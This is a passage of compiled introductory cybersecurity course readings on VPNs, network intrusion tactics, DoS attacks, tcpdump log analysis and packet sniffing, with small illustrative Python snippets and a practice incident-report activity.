encapsulation. Encapsulation wraps your encrypted data in an unencrypted data packet, which allows
your data to be sent across the public network while remaining anonymous. Enterprises and other
organizations use VPNs to help protect communications from users’ devices to corporate resources.
Some of these resources include servers or virtual machines that host business applications. Individuals
also use VPNs to increase personal privacy. VPNs protect user privacy by concealing personal
information, including IP addresses, from external servers. A reputable VPN also minimizes its own
access to user internet activity by using strong encryption and other security measures. Organizations
are increasingly using a combination of VPN and SD-WAN capabilities to secure their networks. A
software-defined wide area network (SD-WAN) is a virtual WAN service that allows organizations to
securely connect users to applications across multiple locations and over large geographical distances.
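The encapsulation process described above can be illustrated with a highly simplified sketch: the (already encrypted) inner payload is wrapped in an outer packet addressed to the VPN gateway, so intermediaries only see the outer header. The XOR "cipher", gateway name, and packet structure here are stand-in assumptions; real VPNs use ciphers such as AES, and this code must never be used for actual security.

```python
# Toy sketch of VPN encapsulation. XOR is a placeholder for a real cipher.

def toy_encrypt(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)  # NOT real encryption

def encapsulate(inner_payload: bytes, vpn_gateway: str, key: int) -> dict:
    return {
        "outer_dst": vpn_gateway,                    # visible on the public network
        "payload": toy_encrypt(inner_payload, key),  # hidden inner data
    }

def decapsulate(outer_packet: dict, key: int) -> bytes:
    return toy_encrypt(outer_packet["payload"], key)  # XOR is its own inverse

packet = encapsulate(b"GET /payroll HTTP/1.1", "vpn.example.net", 0x5A)
print(packet["outer_dst"])        # only the gateway address is exposed
print(decapsulate(packet, 0x5A))  # b'GET /payroll HTTP/1.1'
```

The key point the sketch shows: an observer on the public network sees only the outer destination (the VPN gateway), not the true destination or contents of the inner traffic.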
Key takeaways
There are three main categories of network protocols: communication, management, and security
protocols. In this reading, you learned the fundamentals of firewalls, proxy servers, and VPNs. More
organizations are implementing a cloud-based approach to network security by incorporating a
combination of VPN and SD-WAN capabilities as a service.
VPN protocols: Wireguard and IPSec
A VPN, or virtual private network, is a network security service that changes your public IP address and
hides your virtual location so that you can keep your data private when you’re using a public network
like the internet. VPNs provide a server that acts as a gateway between a computer and the internet.
This server creates a path similar to a virtual tunnel that hides the computer’s IP address and encrypts
the data in transit to the internet. The main purpose of a VPN is to create a secure connection between a
computer and a network. Additionally, a VPN allows trusted connections to be established on untrusted networks. VPN protocols determine how the secure network tunnel is formed. Different VPN providers offer different VPN protocols.
This reading will cover the differences between remote access and site-to-site VPNs, and two VPN
protocols: WireGuard VPN and IPSec VPN. A VPN protocol is similar to a network protocol: It’s a set of
rules or instructions that will determine how data moves between endpoints. An endpoint is any device
connected on a network. Some examples of endpoints include computers, mobile devices, and servers.
Remote access and site-to-site VPNs
Individual users use remote access VPNs to establish a connection between a personal device and a VPN
server. Remote access VPNs encrypt data sent or received through a personal device. The connection
between the user and the remote access VPN is established through the internet.
Enterprises use site-to-site VPNs largely to extend their network to other networks and locations. This is
particularly useful for organizations that have many offices across the globe. IPSec is commonly used in
site-to-site VPNs to create an encrypted tunnel between the primary network and the remote network.
One disadvantage of site-to-site VPNs is how complex they can be to configure and manage compared to
remote access VPNs.
WireGuard VPN vs. IPSec VPN
WireGuard and IPSec are two different VPN protocols used to encrypt traffic over a secure network
tunnel. The majority of VPN providers offer a variety of options for VPN protocols, such as WireGuard or
IPSec. Ultimately, choosing between IPSec and WireGuard depends on many factors, including
connection speeds, compatibility with existing network infrastructure, and business or individual needs.
WireGuard VPN
WireGuard is a high-speed VPN protocol that uses advanced encryption to protect users when they are
accessing the internet. It's designed to be simple to set up and maintain. WireGuard can be used for both
site-to-site and client-server connections. WireGuard is newer than IPSec, and many people use it
because its smaller codebase helps it achieve faster download speeds.
WireGuard is also open source, which makes it easier for users to deploy and debug. This protocol is
useful for processes that require faster download speeds, such as streaming video content or
downloading large files.
IPSec VPN
IPSec is another VPN protocol that may be used to set up VPNs. Most VPN providers use IPSec to encrypt
and authenticate data packets in order to establish secure, encrypted connections. Since IPSec is one of
the earlier VPN protocols, many operating systems support IPSec from VPN providers.
Although IPSec and WireGuard are both VPN protocols, IPSec is older and more complex than
WireGuard. Some clients may prefer IPSec due to its longer history of use, extensive security testing, and
widespread adoption. However, others may prefer WireGuard because of its potential for better
performance and simpler configuration.
Key Takeaways
A VPN protocol is similar to a network protocol: It’s a set of rules or instructions that will determine
how data moves between endpoints. There are two types of VPNs: remote access and site-to-site.
Remote access VPNs establish a connection between a personal device and a VPN server and encrypt or
decrypt data exchanged with a personal device. Enterprises use site-to-site VPNs largely to extend their
network to different locations and networks. IPSec can be used to create site-to-site connections and
WireGuard can be used for both site-to-site and remote access connections.
Remote Access VPN and Site-to-Site VPN are two common configurations used in the context of Virtual
Private Networks (VPNs). They serve different purposes and have distinct characteristics:
Remote Access VPN:
● Purpose: Remote Access VPNs are primarily designed to provide secure access for individual remote users or devices to a private network over the internet. These users could be employees, contractors, or partners who need to connect to the corporate network from outside the organization's physical premises.
● Configuration:
  ● Each remote user typically has a VPN client installed on their device (e.g., laptop, smartphone).
  ● The user initiates a VPN connection from their device to a VPN server or gateway located within the organization's network.
  ● Once connected, the user's device becomes part of the private network and can access internal resources, such as files, applications, or services.
● Use Cases:
  ● Remote employees securely accessing company resources from home or while traveling.
  ● Contractors or partners connecting to specific parts of the corporate network for collaboration.
● Security: Remote Access VPNs are highly secure, as they use strong encryption and authentication methods to protect the data transmitted between the remote device and the corporate network.
Site-to-Site VPN:
● Purpose: Site-to-Site VPNs, also known as router-to-router VPNs, are used to establish secure connections between two or more physical locations (typically office branches or data centers). They enable these locations to communicate with each other as if they were on the same local network.
● Configuration:
  ● VPN routers or gateways are set up at each physical location.
  ● These routers establish encrypted tunnels between them over the internet.
  ● All traffic between the sites is routed through these tunnels, creating a seamless network connection.
● Use Cases:
  ● Interconnecting multiple office branches to share resources and data securely.
  ● Connecting a company's main data center to remote disaster recovery sites.
● Security: Site-to-Site VPNs provide a high level of security, ensuring that all data transmitted between the connected locations is encrypted and protected.
Key Differences:
● Scope: Remote Access VPNs are designed for individual remote users or devices, while Site-to-Site VPNs connect entire networks or physical locations.
● Initiation: In Remote Access VPNs, individual users initiate the VPN connection from their devices. In Site-to-Site VPNs, the connection is typically always on and established between network routers or gateways.
● Use Case: Remote Access VPNs are suitable for remote workers and individuals needing access to specific resources. Site-to-Site VPNs are ideal for interconnecting physical locations or offices.
● Security Focus: Both types of VPNs prioritize security, but Site-to-Site VPNs are more focused on connecting networks securely, whereas Remote Access VPNs are tailored for securing individual remote connections.
In summary, Remote Access VPNs are used for secure remote access to a network, while Site-to-Site
VPNs are used to connect multiple physical locations or networks together. The choice between the two
depends on the specific needs of an organization and its network architecture.
Glossary terms from module 2
Terms and definitions from Course 3, Module 2
Address Resolution Protocol (ARP): A network protocol used to determine the MAC address of the next
router or device on the path
Cloud-based firewalls: Software firewalls that are hosted by the cloud service provider
Controlled zone: A subnet that protects the internal network from the uncontrolled zone
Domain Name System (DNS): A networking protocol that translates internet domain names into IP
addresses
Encapsulation: A process performed by a VPN service that protects your data by wrapping sensitive data
in other data packets
Firewall: A network security device that monitors traffic to or from your network
Forward proxy server: A server that regulates and restricts a person’s access to the internet
Hypertext Transfer Protocol (HTTP): An application layer protocol that provides a method of
communication between clients and website servers
Hypertext Transfer Protocol Secure (HTTPS): A network protocol that provides a secure method of
communication between clients and servers
IEEE 802.11 (Wi-Fi): A set of standards that define communication for wireless LANs
Network protocols: A set of rules used by two or more devices on a network to describe the order of
delivery of data and the structure of data
Network segmentation: A security technique that divides the network into segments
Port filtering: A firewall function that blocks or allows certain port numbers to limit unwanted
communication
Proxy server: A server that fulfills the requests of its clients by forwarding them to other servers
Reverse proxy server: A server that regulates and restricts the internet's access to an internal server
Secure File Transfer Protocol (SFTP): A secure protocol used to transfer files from one device to another
over a network
Secure shell (SSH): A security protocol used to create a shell with a remote system
Security zone: A segment of a company’s network that protects the internal network from the internet
Simple Network Management Protocol (SNMP): A network protocol used for monitoring and managing
devices on a network
Stateful: A class of firewall that keeps track of information passing through it and proactively filters out
threats
Stateless: A class of firewall that operates based on predefined rules and does not keep track of
information from data packets
Subnetting: The subdivision of a network into logical groups called subnets
Transmission Control Protocol (TCP): An internet communication protocol that allows two devices to
form a connection and stream data
Uncontrolled zone: The portion of the network outside the organization
Virtual private network (VPN): A network security service that changes your public IP address and
masks your virtual location so that you can keep your data private when you are using a public network
like the internet
Wi-Fi Protected Access (WPA): A wireless security protocol for devices to connect to the internet
Network Intrusion Tactics
Now you'll learn how to secure networks, so that the valuable information they contain doesn't get
into the wrong hands. We're going to discuss how network intrusion tactics can present a threat to
networks and how a security analyst can protect against network attacks. Let's get started. Let's
start by answering the question, why do we need secure networks? As you've learned, networks are
constantly at risk of attack from malicious hackers. Attackers can infiltrate networks via malware,
spoofing, or packet sniffing. Network operations can also be disrupted
by attacks such as packet flooding. As we go along, you're going to learn about these and other
common network intrusion attacks in more detail. Protecting a network from these types of attacks
is important. If even one of them happens, it could have a catastrophic impact on an organization.
Attacks can harm an organization by leaking valuable or confidential information. They can also be
damaging to an organization's reputation and impact customer retention. Mitigating attacks may
also cost the organization money and time. Over the last few years, there have been several
examples of damage that cyber-attacks can cause. One notorious example was an attack against the
American home-improvement chain, Home Depot, in 2014. A group of hackers compromised and
infected Home Depot servers with malware. By the time network administrators shut down the
attack, the hackers had already taken the credit and debit card information for over 56 million
customers. Now, you know why it's so important to secure a network. But to keep a network secure,
you need to know what kinds of attacks to protect it from.
How intrusions compromise your system
In this section of the course, you learned that every network has inherent vulnerabilities and could
become the target of a network attack.
Attackers could have varying motivations for attacking your organization’s network. They may have
financial, personal, or political motivations, or they may be a disgruntled employee or an activist who
disagrees with the company's values and wants to harm an organization’s operations. Malicious actors
can target any network. Security analysts must be constantly alert to potential vulnerabilities in their
organization’s network and take quick action to mitigate them.
In this reading, you’ll learn about network interception attacks and backdoor attacks, and the possible
impacts these attacks could have on an organization.
Network interception attacks
Network interception attacks work by intercepting network traffic and stealing valuable information or
interfering with the transmission in some way.
Malicious actors can use hardware or software tools to capture and inspect data in transit. This is
referred to as packet sniffing. In addition to seeing information that they are not entitled to, malicious
actors can also intercept network traffic and alter it. These attacks can cause damage to an
organization’s network by inserting malicious code modifications or altering the message and
interrupting network operations. For example, an attacker can intercept a bank transfer and change the
account receiving the funds to one that the attacker controls.
Later in this course you will learn more about malicious packet sniffing, and other types of network
interception attacks: on-path attacks and replay attacks.
Backdoor attacks
A backdoor attack is another type of attack you will need to be aware of as a security analyst. An
organization may have a lot of security measures in place, including cameras, biometric scans and access
codes to keep employees from entering and exiting without being seen. However, an employee might
work around the security measures by finding a backdoor to the building that is not as heavily
monitored, allowing them to sneak out for the afternoon without being seen.
In cybersecurity, backdoors are weaknesses intentionally left by programmers or system and network
administrators that bypass normal access control mechanisms. Backdoors are intended to help
programmers conduct troubleshooting or administrative tasks. However, backdoors can also be
installed by attackers after they’ve compromised an organization to ensure they have persistent access.
Once the hacker has entered an insecure network through a backdoor, they can cause extensive damage:
installing malware, performing a denial of service (DoS) attack, stealing private information or changing
other security settings that leaves the system vulnerable to other attacks. A DoS attack is an attack that
targets a network or server and floods it with network traffic.
Possible impacts on an organization
As you’ve learned already, network attacks can have a significant negative impact on an organization.
Let’s examine some potential consequences.
● Financial: When a system is taken offline with a DoS attack, or business operations are halted or slowed down by some other tactic, the attack prevents a company from performing the tasks that generate revenue. Depending on the size of an organization, interrupted operations can cost millions of dollars. In addition, if a malicious actor gets access to the personal information of the company's clients or customers, the company may face heavy litigation and settlement costs if customers seek legal recourse.
● Reputation: Attacks can also have a negative impact on the reputation of an organization. If it becomes public knowledge that a company has experienced a cyber attack, the public may become concerned about the security practices of the organization. They may stop trusting the company with their personal information and choose a competitor to fulfill their needs.
● Public safety: If an attack occurs on a government network, this can potentially impact the safety and welfare of the citizens of a country. In recent years, defense agencies across the globe have been investing heavily in combating cyber warfare tactics. If a malicious actor gained access to a power grid, a public water system, or even a military defense communication system, the public could face physical harm due to a network intrusion attack.
Key takeaways
Malicious actors are constantly looking for ways to exploit systems. They learn about new
vulnerabilities as they arise and attempt to exploit every vulnerability in a system. Attackers leverage
backdoor attack methods and network interception attacks to gain sensitive information they can use to
exploit an organization or cause serious damage. These types of attacks can impact an organization
financially, damage its reputation, and potentially put the public in danger. It is important that security
analysts stay educated to maintain network safety and reduce the likelihood and impact of these types of
attacks. Securing networks has never been more important.
Denial of Service (DoS) attacks
A denial of service attack is an attack that targets a network or server and floods it with
network traffic. The objective of a denial of service attack, or a DoS attack, is to disrupt normal business
operations by overloading an organization's network. The goal of the attack is to send so much
information to a network device that it crashes or is unable to respond to legitimate users. This means
that the organization won't be able to conduct their normal business operations, which can cost them
money and time. A network crash can also leave them vulnerable to other security
threats and attacks. A distributed denial of service attack, or DDoS, is a kind of DoS attack that uses
multiple devices or servers in different locations to flood the target network with unwanted traffic. Use of
numerous devices makes it more likely that the total amount of traffic sent will overwhelm the target
server. Remember, DoS stands for denial of service. So it doesn't matter what part of the network the
attacker overloads; if they overload anything, they win. An unfortunate example I've seen is an attacker
who crafted a very careful packet that caused a router to spend extra time processing the request. The
overall traffic volume didn't overload the router; the specifics within the packet did. Now we'll discuss
network level DoS attacks that target network bandwidth to slow traffic. Let's learn about three
common network level DoS attacks. The first is called a SYN flood attack. A SYN flood attack is a type of
DoS attack that simulates the TCP connection and floods the server with SYN packets. Let's break this
definition down a bit more by taking a closer look at the handshake process that is used to establish a
TCP connection between a device and a server. The first step in the handshake is for the device to send a
SYN, or synchronize, request to the server. Then, the server responds with a SYN/ACK packet to
acknowledge the receipt of the device's request and leaves a port open for the final step of the
handshake. Once the server receives the final ACK packet from the device, a TCP connection is
established. Malicious actors can take advantage of the protocol by flooding a server with SYN packet
requests for the first part of the handshake. But if the number of SYN requests is larger than the number
of available ports on the server, then the server will be overwhelmed and become unable to function.
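The SYN flood mechanic described above can be modeled in a few lines. The backlog size and address names here are assumed numbers for illustration, not a real TCP stack: each SYN consumes a slot in the server's table of half-open connections, and the attacker never sends the final ACK.

```python
# Illustrative model of a SYN flood exhausting a server's half-open
# connection backlog (assumed numbers; not a real TCP implementation).

class ToyServer:
    def __init__(self, backlog_size: int):
        self.backlog_size = backlog_size
        self.half_open = set()  # connections awaiting the final ACK

    def receive_syn(self, client: str) -> str:
        if len(self.half_open) >= self.backlog_size:
            return "DROPPED"   # backlog full: legitimate users are locked out
        self.half_open.add(client)
        return "SYN/ACK"       # server reserves a slot and waits for the ACK

    def receive_ack(self, client: str) -> str:
        self.half_open.discard(client)  # handshake complete, slot freed
        return "ESTABLISHED"

server = ToyServer(backlog_size=3)
# The attacker sends SYNs from spoofed addresses and never completes
# the handshake, so every slot stays occupied:
for i in range(3):
    server.receive_syn(f"spoofed-{i}")
print(server.receive_syn("legitimate-user"))  # DROPPED
```

Real servers use much larger backlogs plus timeouts and defenses such as SYN cookies, but the failure mode is the same: resources reserved for half-open connections run out before legitimate users can connect.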
Let's discuss two other common DoS attacks that use another protocol called ICMP. ICMP stands for
Internet
Control Message Protocol. ICMP is an internet protocol used by devices to tell each other about data
transmission errors across the network. Think of ICMP like a request for a status update
from a device. The device will return error messages if there is a network concern. You can think of this
like the ICMP request checking in with the device to make sure that all is well. An ICMP flood attack is a
type of DoS attack performed by an attacker repeatedly sending ICMP packets to a network server. This
forces the server to respond with an ICMP packet for each request, which eventually uses up all the bandwidth for incoming and
outgoing traffic and causes the server to crash. Both attacks we've discussed so far, SYN flood and ICMP
flood, take advantage of communication protocols by sending an overwhelming number of requests.
There are also attacks that can overwhelm the server with one big request. One example that we'll
discuss is called the ping of death. A ping of death attack is a type of DoS attack that is caused when a
hacker pings a system by sending it an oversized ICMP packet that is bigger than 64 kilobytes, the
maximum size for a correctly formed ICMP packet. Pinging a vulnerable network server with an
oversized ICMP packet will overload the system and cause it to crash. Think of this like dropping a rock
on a small anthill. Each individual ant can carry a certain amount of weight while transporting food to
and from the anthill. But if a large rock is dropped on the anthill, then many ants will be crushed, and the
colony is unable to function until it rebuilds its operations elsewhere.
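A simple size check captures the idea behind defending against the ping of death: a correctly formed IPv4 packet can be at most 65,535 bytes (roughly 64 kilobytes), so anything larger after reassembly is malformed and should be rejected. This sketch only illustrates the boundary condition; real protection lives in the operating system's network stack.

```python
# Sketch of the size boundary exploited by ping of death attacks:
# the maximum legal IPv4 packet size is 65,535 bytes (~64 KB).
MAX_IP_PACKET_BYTES = 65_535

def is_valid_ping_size(total_bytes: int) -> bool:
    """Return True if a reassembled ICMP echo request has a legal size."""
    return 0 < total_bytes <= MAX_IP_PACKET_BYTES

print(is_valid_ping_size(64))      # True: a typical, normal-sized ping
print(is_valid_ping_size(65_536))  # False: oversized "ping of death" packet
```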
Read tcpdump logs
A network protocol analyzer, sometimes called a packet sniffer or a packet analyzer, is a tool designed to
capture and analyze data traffic within a network. They are commonly used as investigative tools to
monitor networks and identify suspicious activity. There are a wide variety of network protocol
analyzers available, but some of the most common analyzers include:
● SolarWinds NetFlow Traffic Analyzer
● ManageEngine OpManager
● Azure Network Watcher
● Wireshark
● tcpdump
This reading will focus exclusively on tcpdump, though you can apply what you learn here to many of
the other network protocol analyzers you'll use as a cybersecurity analyst to defend against any network
intrusions. In an upcoming activity, you’ll review a tcpdump data traffic log and identify a DoS attack to
practice these skills.
tcpdump
tcpdump is a command-line network protocol analyzer. It is popular and lightweight, meaning it uses little
memory and has low CPU usage, and it uses the open-source libpcap library. tcpdump is text based,
meaning all commands in tcpdump are executed in the terminal. It can also be installed on other Unix-based operating systems, such as macOS®. It is preinstalled on many Linux distributions.
tcpdump provides a brief packet analysis and converts key information about network traffic into
formats easily read by humans. It prints information about each packet directly into your terminal.
tcpdump also displays the source IP address, destination IP addresses, and the port numbers being used
in the communications.
Interpreting output
tcpdump prints the output of the command as the sniffed packets in the command line, and optionally to
a log file, after a command is executed. The output of a packet capture contains many pieces of
important information about the network traffic.
Some information you receive from a packet capture includes:
● Timestamp: The output begins with the timestamp, formatted as hours, minutes, seconds, and fractions of a second.
● Source IP: The packet's origin is provided by its source IP address.
● Source port: This port number is where the packet originated.
● Destination IP: The destination IP address is where the packet is being transmitted to.
● Destination port: This port number is where the packet is being transmitted to.
Note: By default, tcpdump will attempt to resolve host addresses to hostnames. It'll also replace port
numbers with commonly associated services that use these ports.
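The fields above can be pulled out of a capture line programmatically. The sample line below is a representative example written for this sketch (real tcpdump output varies with the flags used and the protocol captured), and the regular expression only handles this simplified IPv4 TCP form:

```python
# Parse the key fields from one representative line of tcpdump output.
import re

SAMPLE = "13:24:32.192571 IP 10.0.0.5.52444 > 142.250.1.139.443: Flags [S]"

PATTERN = re.compile(
    r"(?P<time>\d{2}:\d{2}:\d{2}\.\d+) IP "   # timestamp (h:m:s.fraction)
    r"(?P<src_ip>[\d.]+)\.(?P<src_port>\d+)"  # source IP and port
    r" > "
    r"(?P<dst_ip>[\d.]+)\.(?P<dst_port>\d+):" # destination IP and port
)

m = PATTERN.search(SAMPLE)
print(m.group("time"))                         # 13:24:32.192571
print(m.group("src_ip"), m.group("src_port"))  # 10.0.0.5 52444
print(m.group("dst_ip"), m.group("dst_port"))  # 142.250.1.139 443
```

Note that tcpdump appends the port to the IP address with a dot, which is why the pattern splits the final dotted group into a separate port field.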
Common uses
tcpdump and other network protocol analyzers are commonly used to capture and view network
communications and to collect statistics about the network, such as troubleshooting network
performance issues. They can also be used to:
● Establish a baseline for network traffic patterns and network utilization metrics.
● Detect and identify malicious traffic.
● Create customized alerts to send the right notifications when network issues or security threats arise.
● Locate unauthorized instant messaging (IM) traffic or wireless access points.
However, attackers can also use network protocol analyzers maliciously to gain information about a
specific network. For example, attackers can capture data packets that contain sensitive information,
such as account usernames and passwords. As a cybersecurity analyst, it's important to understand the
purpose and uses of network protocol analyzers.
Key takeaways
Network protocol analyzers, like tcpdump, are common tools that can be used to monitor network
traffic patterns and investigate suspicious activity. tcpdump is a command-line network protocol
analyzer that is compatible with Linux/Unix and macOS®. When you run a tcpdump command, the tool
will output packet routing information, like the timestamp, source IP address and port number, and the
destination IP address and port number. Unfortunately, attackers can also use network protocol
analyzers to capture data packets that contain sensitive information, such as account usernames and
passwords.
Real-life DDoS attack
Previously, you were introduced to Denial of Service (DoS) attacks. You also learned that volumetric
distributed DoS (DDoS) attacks overwhelm a network by sending unwanted data packets in such large
quantities that the servers become unable to service normal users. This can be detrimental to an
organization. When systems fail, organizations cannot meet their customers' needs. They often lose
money, and in some cases, incur other losses. An organization’s reputation may also suffer if news of a
successful DDoS attack reaches consumers, who then question the security of the organization.
In this reading you’ll learn about a 2016 DDoS attack against DNS servers that caused major outages at
multiple organizations that have millions of daily users.
A DDoS targeting a widely used DNS server
In previous videos, you learned about the function of a DNS server. As a review, DNS servers translate
website domain names into the IP address of the system that contains the information for the website.
For instance, if a user were to type in a website URL, a DNS server would translate that into a numeric IP
address that directs network traffic to the location of the website’s server.
On the day of the DDoS attack we are studying, many large companies were using a DNS service
provider. The service provider was hosting the DNS system for these companies. This meant that when
internet users typed in the URL of the website they wanted to access, their devices would be directed to
the right place. On October 21, 2016, the service provider was the victim of a DDoS attack.
Leading up to the attack
Before the attack on the service provider, a group of university students created a botnet with the
intention to attack various gaming servers and networks. A botnet is a collection of computers infected
by malware that are under the control of a single threat actor, known as the “bot-herder." Each
computer in the botnet can be remotely controlled to send a data packet to a target system. In a botnet
attack, cyber criminals instruct all the bots on the botnet to send data packets to the target system at the
same time, resulting in a DDoS attack.
The group of university students posted the code for the botnet online so that it would be accessible to
thousands of internet users and authorities wouldn’t be able to trace the botnet back to the students. In
doing so, they made it possible for other malicious actors to learn the code to the botnet and control it
remotely. This included the cyber criminals who attacked the DNS service provider.
The day of attack
At 7:00 a.m. on the day of the attack, the botnet sent tens of millions of DNS requests to the service
provider. This overwhelmed the system and the DNS service shut down. This meant that all of the
websites that used the service provider could not be reached. When users tried to access various
websites that used the service provider, they were not directed to the website they typed in their
browser. Outages for each web service occurred all over North America and Europe.
The service provider’s systems were restored after only two hours of downtime. Although the cyber
criminals sent subsequent waves of botnet attacks, the DNS company was prepared and able to mitigate
the impact.
Key takeaways
As demonstrated in the above example, DDoS attacks can be very damaging to an organization. As a
security analyst, it’s important to recognize the seriousness of such attacks so that you’re aware of
opportunities to protect the network from them. If your network has important operations distributed
across hosts that can be dynamically scaled, then operations can continue if the baseline host
infrastructure goes offline. DDoS attacks are damaging, but there are concrete actions that security
analysts can take to help protect their organizations. Keep going through this course and you will learn
about common mitigation strategies to protect against DDoS attacks.
To pass this practice quiz, you must receive 100%, or 1 out of 1 point, by completing the following
activity. You can learn more about graded and practice items in the course overview.
Activity Overview
In this activity, you will analyze DNS and ICMP traffic in transit using data from a network protocol
analyzer tool. You will identify which network protocol was involved in the cybersecurity incident.
In the internet layer of the TCP/IP model, the Internet Protocol (IP) formats data packets into IP datagrams. The
information provided in the datagram of an IP packet can provide security analysts with insight into
suspicious data packets in transit.
Knowing how to identify potentially malicious traffic on a network can help cybersecurity analysts
assess security risks on a network and reinforce network security.
Scenario
You are a cybersecurity analyst working at a company that specializes in providing IT consultant
services. Several customers contacted your company to report that they were not able to access the
company website www.yummyrecipesforme.com, and saw the error “destination port unreachable”
after waiting for the page to load.
You are tasked with analyzing the situation and determining which network protocol was affected
during this incident. To start, you visit the website and you also receive the error “destination port
unreachable.” Next, you load your network analyzer tool, tcpdump, and load the webpage again. This
time, you receive a lot of packets in your network analyzer. The analyzer shows that when you send UDP
packets and receive an ICMP response returned to your host, the results contain an error message: “udp
port 53 unreachable.”
In the DNS and ICMP log, you find the following information:
1. In the first two lines of the log file, you see the initial outgoing request from your computer to
the DNS server requesting the IP address of yummyrecipesforme.com. This request is sent in a
UDP packet.
2. Next, you find the timestamp that indicates when the event happened. In the log, this is the first
sequence of numbers displayed. For example: 13:24:32.192571. This represents the time 1:24
p.m. and 32.192571 seconds.
3. The source and destination IP addresses are next. In the error log, this information is displayed as:
192.51.100.15.52444 > 203.0.113.2.domain. The IP address to the left of the greater than (>)
symbol is the source address. In this example, the source is your computer’s IP address. The IP
address to the right of the greater than (>) symbol is the destination IP address. In this case, it is
the IP address for the DNS server: 203.0.113.2.domain
4. The second and third lines of the log show the response to your initial UDP request packet. In
this case, the ICMP 203.0.113.2 line is the start of the error message indicating that the UDP
packet was undeliverable to the port of the DNS server.
5. Next are the protocol and port number, which displays which protocol was used to handle
communications and which port it was delivered to. In the error log, this appears as: udp port 53
unreachable. This means that the UDP protocol was used to request a domain name resolution
using the address of the DNS server over port 53. Port 53, which aligns to the .domain extension
in 203.0.113.2.domain, is a well-known port for DNS service. The word “unreachable” in the
message indicates the message did not go through to the DNS server. Your browser was not able
to obtain the IP address for yummyrecipesforme.com, which it needs to access the website
because no service was listening on the receiving DNS port as indicated by the ICMP error
message “udp port 53 unreachable.”
6. The remaining lines in the log indicate that ICMP packets were sent two more times, but the
same delivery error was received both times.
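The fields described in the steps above can be pulled out of a tcpdump-style line programmatically. This is a hedged sketch: the sample line mirrors the timestamp and addresses from the reading, but the trailing query details (`35084+ A? ...`) are hypothetical placeholders:

```python
import re

# Illustrative tcpdump-style DNS request line (query details are made up):
LINE = ("13:24:32.192571 IP 192.51.100.15.52444 > 203.0.113.2.domain: "
        "35084+ A? yummyrecipesforme.com. (24)")

def parse_entry(line: str) -> dict:
    """Extract the timestamp, source, and destination from a log line."""
    m = re.match(r"^(\S+) IP (\S+) > ([^:]+):", line)
    if not m:
        raise ValueError("unrecognized log line")
    timestamp, src, dst = m.groups()
    return {"timestamp": timestamp, "source": src, "destination": dst}

entry = parse_entry(LINE)
print(entry["source"])       # 192.51.100.15.52444
print(entry["destination"])  # 203.0.113.2.domain
```

Note that the last dotted segment of each address is the port (52444) or its well-known service name (domain, i.e., port 53), exactly as described in step 5.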
Now that you have captured data packets using a network analyzer tool, it is your job to identify which
network protocol and service were impacted by this incident. Then, you will need to write a follow-up
report.
As an analyst, you can inspect network traffic and network data to determine what is causing network-related issues during cybersecurity incidents. Later in this course, you will demonstrate how to manage
and resolve incidents. For now, you only need to analyze the situation.
This incident, in the meantime, is being handled by security engineers after you and other analysts have
reported the issue to your direct supervisor.
Step-By-Step Instructions
Follow the instructions and answer the question below to complete the activity. Then, go to the next
course item to compare your work to a completed exemplar.
Step 1: Access the template
To use the template for this course item, click the link below and select Use Template.
Use the sentence starters and prompts provided in the template to support your thinking and ensure
that you include all relevant details about the incident.
Link to template:
● Cybersecurity incident report template
OR
If you don’t have a Google account, you can download the template directly from the attachment below.
Cybersecurity incident report network traffic analysis
DOCX File
Step 2: Access supporting materials
The following supporting materials will help you complete this activity. Keep them open as you proceed
to the next steps.
To use the supporting materials for this course item, click the following links and select Use Template.
Link to supporting materials:
● Example of a Cybersecurity Incident Report
OR
If you don’t have a Google account, you can download the supporting materials directly from the
attachment below.
Example of a Cybersecurity Incident Report
DOCX File
Steps 3 and 4
Step 3: Provide a summary of the problem found in the DNS
and ICMP traffic log
The network traffic analyzer tool inspects all IP packets traveling through the network
interfaces of the machine it runs on. Network packets are recorded into a file. After
analyzing the data presented to you from the DNS and ICMP traffic log, identify trends in
the data. Assess which protocol is producing the error message when resolving the URL
with the DNS server for the yummyrecipesforme.com website. Recall that one of the ports
that is displayed repeatedly is port 53, commonly used for DNS. In your analysis:
● Include a summary of the DNS and ICMP log analysis and identify which protocol
was used for the ICMP traffic.
● Provide a few details about what was indicated in the logs.
● Interpret the issues found in the logs.
Record your responses in part one of the cybersecurity incident report.
Step 4: Explain your analysis of the data and provide one
solution to implement
Now that you’ve inspected the traffic log and identified trends in the traffic, describe why
the error messages appeared on the log. Use your answer in the previous step and the
scenario to identify the reason behind the ICMP error messages. The error messages
indicate that there is an issue with a specific port. What do the different protocols involved
in the log reveal about the incident? In your response:
● State when the problem was first reported.
● Provide the scenario, events, and symptoms identified when the event was first
reported.
● Describe the information discovered while investigating the issue up to this point.
● Explain the current status of the issue.
● Provide the suspected root cause of the problem.
What to Include in Your Response
Be sure to address the following items in your completed activity:
● Provide a summary of the problem found in the DNS and ICMP traffic log
● Explain your analysis of the data and provide one possible cause of the incident
Assessment of Exemplar
Compare the exemplar to your completed activity. Review your work using each of the
criteria in the exemplar. What did you do well? Where can you improve? Use your answers
to these questions to guide you as you continue to progress through the course.
Note: The exemplar offers one possible approach to investigating and analyzing a possible
security event. In your role as a security analyst, you and your team would make a best
guess about what happened and then investigate further to troubleshoot the issue and
strengthen the overall security of your network.
Writing an effective cybersecurity analysis report can help troubleshoot network issues
and vulnerabilities more quickly and effectively. The more practice you have analyzing
network traffic for suspicious trends and activity, the more effective you and your team will
be at managing and responding to risks that are present on your network.
Key takeaways
As a security analyst, you may not always know exactly what is at the root of a network
issue or a possible attack. But being able to analyze the IP packets involved will help you
make a best guess about what happened or potentially prevent an attack from invading the
network. The network protocol and traffic logs will become the starting point for
investigating the issue further and addressing the attack.
Malicious Packet Sniffing
We'll discuss packet sniffing, with a focus on how threat actors may use this technique to gain
unauthorized access to information. Previously, you learned about the information and data
packets that travel across the network. Packets include a header which contains the sender's and
receiver's IP addresses. Packets also contain a body, which may contain valuable information like
names, date of birth, personal messages, financial information, and
credit card numbers. Packet sniffing is the practice of using software tools to observe data as it
moves across a network. As a security analyst, you may use packet sniffing to analyze and capture
packets when investigating ongoing incidents or debugging network issues. However, malicious
actors may also use packet sniffing to look at data that has not been sent to them. This is a little bit
like opening somebody else's mail. It's important for you to learn about how threat actors use
packet sniffing with harmful intent so you can be prepared to protect against these malicious acts.
Malicious actors may insert themselves in the middle of an authorized connection between two
devices. Then they can use packet sniffing to spy on every data packet as it comes across their
device. The goal is to find valuable information in the data packets that they can then use to their
advantage. Attackers can use software applications or a hardware device to look into data packets.
Malicious actors can access a network packet with a packet sniffer and make changes to the data.
